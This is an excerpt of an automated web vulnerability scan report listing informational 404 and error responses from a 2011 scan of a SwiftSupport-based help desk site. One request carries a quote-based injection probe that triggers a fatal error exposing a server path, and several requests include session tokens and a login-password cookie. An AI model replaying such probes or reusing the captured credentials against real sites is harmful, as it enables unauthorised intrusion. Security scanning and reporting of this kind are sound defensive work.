HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:03:33 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.49. https://support.trust-guard.com/%22javascript:void(0)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /%22javascript:void(0)

Request

GET /%22javascript:void(0);/ HTTP/1.1
Referer: https://support.trust-guard.com/%22javascript:void(0);/%22
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:07:22 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2291
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.50. https://support.trust-guard.com/Netsparker03e6310133444d22bbcca067934a439c.php%253f_ca=css&group=default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /Netsparker03e6310133444d22bbcca067934a439c.php%253f_ca=css&group=default

Request

GET /Netsparker03e6310133444d22bbcca067934a439c.php%253f_ca=css&group=default HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:07:56 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2337
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.51. https://support.trust-guard.com/Netsparker19d6b085cb76431fb531d5b2684cc293.php%3f_ca=css&group=default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /Netsparker19d6b085cb76431fb531d5b2684cc293.php%3f_ca=css&group=default

Request

GET /Netsparker19d6b085cb76431fb531d5b2684cc293.php%3f_ca=css&group=default HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:06:38 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2359
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.52. https://support.trust-guard.com/Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php

Request

GET /Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:08:57 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
33.53. https://support.trust-guard.com/Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php

Request

GET /Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:05 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
33.54. https://support.trust-guard.com/Netsparkercd451056256c40529051e01cf989486a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /Netsparkercd451056256c40529051e01cf989486a

Request

GET /Netsparkercd451056256c40529051e01cf989486a HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:07:03 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2333
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.55. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /index.php

Request

GET /index.php?_m=%2527&_a=submit HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:00:45 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 126

<br />
<b>Fatal error</b>: in <b>/homepages/9/d212015129/htdocs/support/includes/functions.php</b> on line <b>867</b><br />
33.56. https://support.trust-guard.com/spicons/Netsparkerb1ba33b014ca47e191835f0abeba3f7b/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /spicons/Netsparkerb1ba33b014ca47e191835f0abeba3f7b/

Request

GET /spicons/Netsparkerb1ba33b014ca47e191835f0abeba3f7b/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:06:40 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2342
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.57. https://support.trust-guard.com/themes/Netsparker9b40ae79bd744aef87f25febd5aeb9f3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/Netsparker9b40ae79bd744aef87f25febd5aeb9f3/

Request

GET /themes/Netsparker9b40ae79bd744aef87f25febd5aeb9f3/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:12 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2341
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.58. https://support.trust-guard.com/themes/client_default//Netsparker9e56a71773734e97bc48ea3149ce48e7.gif)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default//Netsparker9e56a71773734e97bc48ea3149ce48e7.gif)

Request

GET /themes/client_default//Netsparker9e56a71773734e97bc48ea3149ce48e7.gif) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:38 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2361
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.59. https://support.trust-guard.com/themes/client_default/Netsparker043e7727e36a47ddb61936f0af81a5e8.gif)%3b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/Netsparker043e7727e36a47ddb61936f0af81a5e8.gif)%3b

Request

GET /themes/client_default/Netsparker043e7727e36a47ddb61936f0af81a5e8.gif)%3b HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:06:55 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2361
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.60. https://support.trust-guard.com/themes/client_default/Netsparker13749997f7e349eeb0039a51b507d58d.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/Netsparker13749997f7e349eeb0039a51b507d58d.php

Request

GET /themes/client_default/Netsparker13749997f7e349eeb0039a51b507d58d.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:42 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
33.61. https://support.trust-guard.com/themes/client_default/Netsparker1cda35eb01dc4a42ae9c7ed378d0da88.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/Netsparker1cda35eb01dc4a42ae9c7ed378d0da88.js

Request

GET /themes/client_default/Netsparker1cda35eb01dc4a42ae9c7ed378d0da88.js HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:15 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2358
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.62. https://support.trust-guard.com/themes/client_default/Netsparker1e842cbfc9b44f0ab51d781b3a0e56e9.gif)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/Netsparker1e842cbfc9b44f0ab51d781b3a0e56e9.gif)

Request

GET /themes/client_default/Netsparker1e842cbfc9b44f0ab51d781b3a0e56e9.gif); HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:35 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2361
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.63. https://support.trust-guard.com/themes/client_default/Netsparker3dfe82091ca74bbfa9afff71bf5d2527.gif)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/Netsparker3dfe82091ca74bbfa9afff71bf5d2527.gif)

Request

GET /themes/client_default/Netsparker3dfe82091ca74bbfa9afff71bf5d2527.gif) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:32 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2360
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.64. https://support.trust-guard.com/themes/client_default/Netsparker471242ba1c4549158a07bed3637f9c02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/Netsparker471242ba1c4549158a07bed3637f9c02/

Request

GET /themes/client_default/Netsparker471242ba1c4549158a07bed3637f9c02/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 18:59:12 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2356
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.65. https://support.trust-guard.com/themes/client_default/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/index.php

Request

GET /themes/client_default/index.php?languageid= HTTP/1.1
Referer: https://support.trust-guard.com/themes/client_default/basejs.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:00:11 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25

No input file specified.
33.66. https://support.trust-guard.com/themes/client_default/space.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/space.gif/

Request

GET /themes/client_default/space.gif/ HTTP/1.1
Host: support.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_loginemail=deleted; SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9;

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:37:56 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2323
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.67. https://support.trust-guard.com/themes/client_default/staffonline.gif/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /themes/client_default/staffonline.gif/

Request

GET /themes/client_default/staffonline.gif/ HTTP/1.1
Host: support.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_loginemail=deleted; SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9;

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 19:38:15 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR"
Content-Length: 2329
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
   <title>Error 404 - Not found</title>
</head>
<frameset rows="100%" framebo
...[SNIP]...
33.68. https://support.trust-guard.com/themes/client_default/supportsuite.gif/  previous  next

Summary

Severity:   Information
